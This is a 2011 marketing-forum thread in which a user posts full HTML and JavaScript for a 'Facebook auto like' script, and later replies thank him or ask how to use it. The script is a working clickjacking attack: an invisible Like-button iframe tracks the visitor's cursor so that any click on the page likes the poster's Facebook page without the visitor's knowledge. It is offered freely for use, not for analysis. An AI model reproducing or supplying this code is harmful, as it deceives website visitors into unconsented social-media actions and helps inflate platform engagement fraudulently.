Affiliate Programs | Webmaster Forum | Internet Marketing Seo Forum - EmillionForum
FACEBOOK AUTO LIKE SCRIPT FOR FREE - Printable Version

+- Affiliate Programs | Webmaster Forum | Internet Marketing Seo Forum - EmillionForum (http://emillionforum.com)
+-- Forum: Making Money (/Forum-making-money)
+--- Forum: Social Networking / Video Sharing Sites (/Forum-social-networking-video-sharing-sites)
+---- Forum: Facebook (/Forum-facebook)
+---- Thread: FACEBOOK AUTO LIKE SCRIPT FOR FREE (/Thread-facebook-auto-like-script-for-free)



FACEBOOK AUTO LIKE SCRIPT FOR FREE - bibek011 - 10-08-2011 10:40 PM

This script is freely available on the internet yet i see so many people selling it

Facebook Auto Like Script - click anywhere on the page and it likes the page in facebook - User must be logged into facebook to work

Demo : http://i-am-totally-bored.com/facebookautolike.html

Required file : http://i-am-totally-bored.com/jquery-1.4.2.min.js

Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Facebook Auto Like Script</title>

<script src="jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript">
var interval;
        $(function()
{
    interval=setInterval("updateActiveElement();", 50);
});

function updateActiveElement()
{
    if ( $(document.activeElement).attr('id')=="fbframe" )
    {
        clearInterval(interval);
        iflag=1;
    }    
}
        
        </script>
</head>

<body>
        

        
<!--page content goes here-->
<h2>Please click anywhere on the page.</h2>

<p>Now check your facebook wall </p>
. <img src="http://i-am-totally-bored.com/wp-content/uploads/2010/06/article-1290060-0A_1074762a.jpg" />
        
        
      <!-- end of page content (but don't close your html or body tag here)-->
        
        
<div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">


<!--facebook like frame code goes here-->

         <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fi-am-totally-bored.com%2F&amp;layout=standard&amp;show_faces=false&amp;width=450&amp;action=like&amp;font=tahoma&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
        
      <!--end facebook like frame code-->

    </div>
    
    
      <script>
    var iflag = 0;
    var icontainer = document.getElementById('icontainer');    
    var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
    
    
    
    function mouseFollower(e){
        /*                    DO NOT EDIT THIS                         */
    if (window.event)
    { // for IE
        icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
        icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
    }
    else
    {
        icontainer.style.top = (e.pageY-5)+'px';
        icontainer.style.left = (e.pageX-5)+'px';
    }

    }
    document.onmousemove = function(e) {
        if (iflag == 0) {mouseFollower(e);}
    }

    </script>

</body>
</html>

HOPE THIS HELPED YOU......
YOU CAN GET MORE TUTORIALS OR CODES FROM HERE


RE: FACEBOOK AUTO LIKE SCRIPT FOR FREE - scorpiono1 - 10-21-2011 08:14 PM

thanks Absolutely awesome


RE: FACEBOOK AUTO LIKE SCRIPT FOR FREE - PinHead - 10-22-2011 03:28 AM

(10-21-2011 08:14 PM)scorpiono1 Wrote:  thanks Absolutely awesome

tnx


RE: FACEBOOK AUTO LIKE SCRIPT FOR FREE - darkwar - 02-12-2012 06:09 PM

totally cool... already I've collected one like it but wasn't so helpful... so really happy to get this one.... :)


RE: FACEBOOK AUTO LIKE SCRIPT FOR FREE - jaa09 - 05-22-2012 07:16 AM

Where i put this code?